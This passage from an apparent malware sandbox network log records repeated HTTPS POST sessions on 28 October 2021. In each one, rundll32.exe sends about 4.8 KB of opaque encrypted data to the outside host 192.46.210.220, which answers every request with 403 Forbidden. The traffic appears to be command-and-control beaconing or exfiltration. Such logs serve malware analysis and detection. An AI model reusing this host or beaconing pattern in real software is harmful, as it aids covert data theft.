                                                                                                          2021-10-28 03:09:43 UTC189OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:44 UTC194INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:44 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          39192.168.2.649930192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:45 UTC194OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:45 UTC194OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:45 UTC199INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:45 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.649773192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:35 UTC19OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:35 UTC20OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:35 UTC29INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:35 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          40192.168.2.649946192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:47 UTC199OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:47 UTC199OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:47 UTC204INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:47 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          41192.168.2.649958192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:49 UTC204OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:49 UTC204OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:49 UTC209INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:49 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          42192.168.2.649971192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:51 UTC209OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:51 UTC209OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:51 UTC214INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:51 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          43192.168.2.649977192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:52 UTC214OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:52 UTC214OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:53 UTC219INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:53 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          44192.168.2.649981192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:56 UTC219OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:56 UTC219OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:57 UTC224INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:56 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          45192.168.2.649986192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:57 UTC224OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:57 UTC224OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:58 UTC229INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:58 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          46192.168.2.649990192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:00 UTC229OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:00 UTC229OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:00 UTC234INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:00 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          47192.168.2.649994192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:01 UTC234OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:01 UTC234OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:02 UTC239INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:02 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          48192.168.2.649998192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:03 UTC239OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:03 UTC239OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:04 UTC244INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:04 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          49192.168.2.650002192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:05 UTC244OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:05 UTC244OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:06 UTC249INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:06 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.649775192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:35 UTC24OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
